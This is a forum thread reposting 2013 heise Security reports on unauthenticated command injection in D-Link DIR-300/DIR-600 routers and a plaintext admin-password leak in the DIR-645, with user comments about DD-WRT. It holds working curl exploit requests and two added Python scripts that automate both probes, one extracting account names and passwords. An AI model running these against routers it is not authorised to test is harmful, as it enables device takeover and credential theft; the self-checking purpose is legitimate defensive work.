Blog: Multiple Vulnerabilities in D'Link routers DIR-600 and DIR-300 (rev B)

menotu
via heise Security - 06 February 2013

Security expert Michael Messner has identified several holes in D-Link's DIR-300 and DIR-600 routers that allow potential attackers to execute arbitrary commands with little effort. Although current firmware versions are also affected, the router manufacturer does not appear to be planning to close the hole.

Messner describes on his blog how a simple POST parameter allows Linux commands to be executed at root level on vulnerable routers. No password or other authentication is required to do so. In a short test, The H's associates at heise Security found that many of the devices can even be accessed from the internet and managed to inject a harmless command into such a router. A real attacker could randomly exploit systems, for example to divert a router's entire internet traffic to a third-party server.

The holes could be reproduced in the following firmware versions:

DIR-300:

    Version 2.12, released 18 January 2012
    Version 2.13, released 7 November 2012 (current version)

DIR-600:

    Version 2.12b02, released 17 January 2012
    Version 2.13b01, released 07 November 2012
    Version 2.14b01, released 22 January 2013 (current version)

As there is virtually no way of preventing an attack at present, the most sensible solution is to decommission the affected routers – and hope that D-Link will provide security updates one day.

A port scan can be used to confirm whether a router is accessible from the internet. If it is not accessible, there is no immediate danger, but the risk that commands could be injected via CSRF remains. This can also be tested by calling

Code:
http://<router IP>/command.php
in a fresh browser session. If neither an error message nor a request to enter a password is displayed, there is a high risk that the system is, in fact, vulnerable. Users of Linux systems can also check this directly by entering a command such as

Code:
curl --data "cmd=ls" http://<router IP>/command.php
On some devices, the admin front-end runs on port 8080; in this case, something like 192.169.0.1:8080 must be entered as the router IP.

PCLinuxOS 32bit KDE 4.10.1; kernel-3.4.11-pclos1.bfs & 64bit 3.2.18bfs; NVidia GeForce 8400GS 1GB 310.19 driver

Sony Vaio SVE1513A4ESI Laptop, Intel Core i5, 2.6GHz, 6GB RAM, 750GB, 15.6" Intel HD Graphics 4000
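As an added example (not code from the heise article or from Michael Messner's blog), the following Python script automates the two checks above: an unauthenticated GET of /command.php, classified by whether a 401 or a login form comes back, followed by the harmless cmd=ls POST, whose reply is checked for well-known root directory names. It assumes the router answers plain HTTP at the base URL you pass (append :8080 where the admin front-end uses that port). So that it can be run without touching a real device, it also contains a constructed mock router that imitates the described behaviour with canned output; nothing is actually executed. Point check_router only at hardware you own or are authorised to test.

```python
"""Automates the two checks above: an unauthenticated GET of /command.php,
then a harmless POST cmd=ls whose reply is tested for a directory listing.
Added example, not from heise or Michael Messner. Assumes the router speaks
plain HTTP at base_url (put ':8080' in base_url where the admin UI uses it)."""
import re
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

PROBE_CMD = "ls"  # the harmless probe the article uses
LS_MARKERS = {"bin", "etc", "lib", "proc", "sbin", "usr", "var"}
# The router is on the LAN: ignore any http_proxy environment variables.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(url, data=None, timeout=5):
    """GET (data=None) or POST (data=bytes); returns (status, headers, body).
    HTTP error replies are returned rather than raised so they can be classified."""
    req = urllib.request.Request(url, data=data)
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode(errors="replace")


def classify_get(status, headers, body):
    """Classify an unauthenticated GET /command.php: 'auth-required' for a 401
    or a login form, 'not-found', 'open' for a bare 200, else 'error'."""
    if status == 401 or any(k.lower() == "www-authenticate" for k in headers):
        return "auth-required"
    if status == 404:
        return "not-found"
    if status == 200 and re.search(r'<input[^>]+type=["\']?password', body, re.I):
        return "auth-required"  # urllib followed a redirect to a login page
    if status == 200:
        return "open"
    return "error"


def looks_like_listing(body):
    """True when the reply names at least three well-known root directories."""
    return len(set(body.split()) & LS_MARKERS) >= 3


def check_router(base_url):
    """Returns the GET verdict, or 'vulnerable' / 'open-but-no-output' after the POST."""
    url = base_url.rstrip("/") + "/command.php"
    verdict = classify_get(*fetch(url))
    if verdict != "open":
        return verdict
    status, _, body = fetch(url, data=urllib.parse.urlencode({"cmd": PROBE_CMD}).encode())
    return "vulnerable" if status == 200 and looks_like_listing(body) else "open-but-no-output"


def make_handler(require_auth):
    """Constructed mock of the behaviour described: with require_auth=False,
    command.php needs no session and 'runs' a POSTed cmd (canned output for
    'ls' only; nothing is executed). With require_auth=True it demands a login."""
    class MockRouter(BaseHTTPRequestHandler):
        def do_GET(self):
            self._handle(None)

        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            form = urllib.parse.parse_qs(self.rfile.read(length).decode())
            self._handle(form.get("cmd", [""])[0])

        def _handle(self, cmd):
            if self.path != "/command.php":
                return self._reply(404, "not found")
            if require_auth:
                return self._reply(401, "login", {"WWW-Authenticate": 'Basic realm="DIR-300"'})
            self._reply(200, "bin dev etc lib proc sbin sys tmp usr var\n" if cmd == "ls" else "")

        def _reply(self, status, body, extra=None):
            data = body.encode()
            self.send_response(status)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(data)))
            for key, value in (extra or {}).items():
                self.send_header(key, value)
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *args):  # keep the demo quiet
            pass
    return MockRouter


def run_against_mock(require_auth):
    """Start a mock router on a free loopback port, check it, and shut it down."""
    srv = HTTPServer(("127.0.0.1", 0), make_handler(require_auth))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return check_router("http://127.0.0.1:%d" % srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("mock vulnerable router:", run_against_mock(require_auth=False))
    print("mock patched router:", run_against_mock(require_auth=True))
```

Run as a script it reports "vulnerable" for the mock without authentication and "auth-required" for the mock with it. Against a real device, a result of "open-but-no-output" means command.php answered without asking for a password but the listing heuristic did not match the reply, which still deserves a manual look rather than a clean bill of health.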

µT6
I asked for a firmware upgrade last year, but they gave me a link to a really old version.

My DIR-600 is an old model, so the firmware versions listed there won't work, so I decided to put DD-WRT on it.

http://www.dd-wrt.com/wiki/index.php/DIR-600

So far not much to report; the only problem I see is that it doesn't have a log, or it is empty.

"A question that sometimes drives me hazy: am I or are the others crazy?"

Albert Einstein

µT6
I have been investigating the problem and the solutions, and it seems that the issue will be fixed for most models, if it is not already fixed in a recent update, version 2.15, but I won't post the link to the firmware because it seems to be regional firmware for Germany.

This router (DIR-600) is very popular; there are BX (mine), B1, B2, B5 and C1 versions of it, so the problem will be fixed soon for all regions, I think.

If not, then DD-WRT works well on it, at least on the DIR-600 with firmware DD-WRT v24-sp2 (12/14/11) std - build 18007 (the one I'm using now).

For the DIR-300 there seems to be a version 2.14 at the moment, but it is the same story as the previous one: for Germany only.

This router (DIR-300) is really old and probably out of any warranty, so DD-WRT for this one is a good idea, I think.

menotu
heise Security  - 06 March 2013

D-Link fixes router vulnerabilities very quietly

In November last year D-Link fixed critical vulnerabilities in its cylinder-shaped DIR-645 wireless router, but neglected to let its customers in on the secret. Users looking for firmware updates on D-Link's US customer site for the router will come across a version 1.03, dated 21 November 2012. The change log promises enhancements for IPv6 and iOS 6 compatibility.


There is no indication that it might contain security fixes, so if the router has been doing its job well up until now, users are unlikely to feel the need to install the update. D-Link also makes no mention of the update on its router security web page.

Search results from the vulnerability search engine SHODAN confirm this impression – of 150 routers of this model which responded to the engine's online queries, the current firmware version is installed on only six. This constitutes a problem because a security researcher has discovered that older versions have a habit of spitting out the administrator password in plain text format. All that's required is a simple curl command:

Code:
curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
The H's associates at heise Security were able to reproduce the problem. D-Link has confirmed the security expert's statement that the vulnerabilities were fixed in the update to the latest firmware version. Users running a DIR-645 should therefore install the update urgently. Even where the router is not accessible from the web, users will want to ensure that non-admin users on the local network are not able to access the password with such a simple hack.

The UK site for the DIR-645 lists firmware version 1.02 b11 as the latest update, which is presumably vulnerable to the attack. Customers from the UK will therefore either have to wait until D-Link releases the update for the UK market as well or will have to install an update which might not be appropriate to their region.


http://www.h-online.com/security/news/item/D-Link-fixes-router-vulnerabilities-very-quietly-1816873.html
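As an added example (not from the heise article or the researcher's write-up), this Python snippet sends the same request as the curl command above and then checks whether the reply hands out account names together with plaintext passwords. The reply format is assumed to be XML in which each account entry holds <name> and <password> children; that schema and the two sample replies are constructed for the example, since the page does not show a real response. Run it only against your own router, and note that check_device deliberately reports account names but not the passwords it finds.

```python
"""Checks whether getcfg.php returns DEVICE.ACCOUNT to an unauthenticated POST.
Added example, not from heise or the researcher. The XML layout (an entry
element holding <name> and <password>) and both sample replies are assumptions."""
import http.client
import urllib.parse
import xml.etree.ElementTree as ET


def post_getcfg(host, port=80, timeout=5):
    """Same request as: curl -d SERVICES=DEVICE.ACCOUNT http://<host>/getcfg.php
    No cookie or credential is sent. Returns (status, body)."""
    form = urllib.parse.urlencode({"SERVICES": "DEVICE.ACCOUNT"})
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", "/getcfg.php", body=form,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


def extract_accounts(body):
    """Return [(name, password), ...] for every element that has both a <name>
    and a <password> child; [] for non-XML or when no such pair is present."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    pairs = []
    for elem in root.iter():
        name, pwd = elem.find("name"), elem.find("password")
        if name is not None and pwd is not None:
            pairs.append((name.text or "", pwd.text or ""))
    return pairs


def leaks_credentials(status, body):
    """A 200 whose body carries at least one name/password pair is the leak."""
    return status == 200 and bool(extract_accounts(body))


def check_device(host, port=80):
    """Probe a real device; reports account names only, never the passwords."""
    status, body = post_getcfg(host, port)
    accounts = extract_accounts(body) if status == 200 else []
    return {"leaks": bool(accounts), "accounts": [name for name, _ in accounts]}


# Constructed samples standing in for an old firmware's reply and a fixed one.
SAMPLE_LEAK = """<?xml version="1.0"?>
<postxml><module><service>DEVICE.ACCOUNT</service>
<device><account><entry><name>admin</name><password>s3cret</password></entry>
</account></device></module></postxml>"""
SAMPLE_FIXED = '<?xml version="1.0"?><postxml><module><service>DEVICE.ACCOUNT</service></module></postxml>'

if __name__ == "__main__":
    print("old firmware reply leaks:", leaks_credentials(200, SAMPLE_LEAK))      # True
    print("fixed firmware reply leaks:", leaks_credentials(200, SAMPLE_FIXED))   # False
    print("401 reply leaks:", leaks_credentials(401, SAMPLE_LEAK))               # False
```

The parser walks every element rather than hard-coding a path, so it still fires if the element nesting differs from the assumed layout as long as a name and password sit side by side; a 401 or any non-200 is treated as not leaking even if the body happens to contain such a pair.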